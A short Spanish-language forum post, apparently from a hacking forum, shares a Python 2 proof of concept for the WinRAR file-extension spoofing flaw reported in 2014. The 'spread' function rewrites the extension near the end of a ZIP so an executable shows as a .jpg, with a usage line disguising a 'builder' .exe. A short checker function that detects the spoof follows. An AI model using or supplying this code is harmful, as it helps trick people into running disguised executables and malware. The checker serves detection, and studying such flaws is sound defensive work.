[Enlace externo eliminado para invitados]
Asi que me escribi algo rapidillo pa hacerlo funcional:
Código: Seleccionar todo
"""
PoC of http://thehackernews.com/2014/04/winrar-file-extension-spoofing.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Security+Blog%29
"""
def spread(sFile, orgExt, newExt):
f = open(sFile, 'r')
content = f.read()
f.close()
f = open('exploited_%s' % sFile, 'w')
f.write(content[0:len(content)-1000] + content[(len(content)-1000)::].replace(orgExt, newExt))
f.close()
def spread_checker(compressed, sFile):
f = open(compressed, 'r')
content = f.read()
f.close()
if sFile in content[0:1000] and sFile in content[(len(content) - 1000)::]:
print "la extension de %s es real" % sFile
else:
print "se trata de un spread"
"""
usage:
spread('builder.zip', 'exe', 'jpg')
spread_checker("exploited_builder.zip", "Buldier.exe")
"""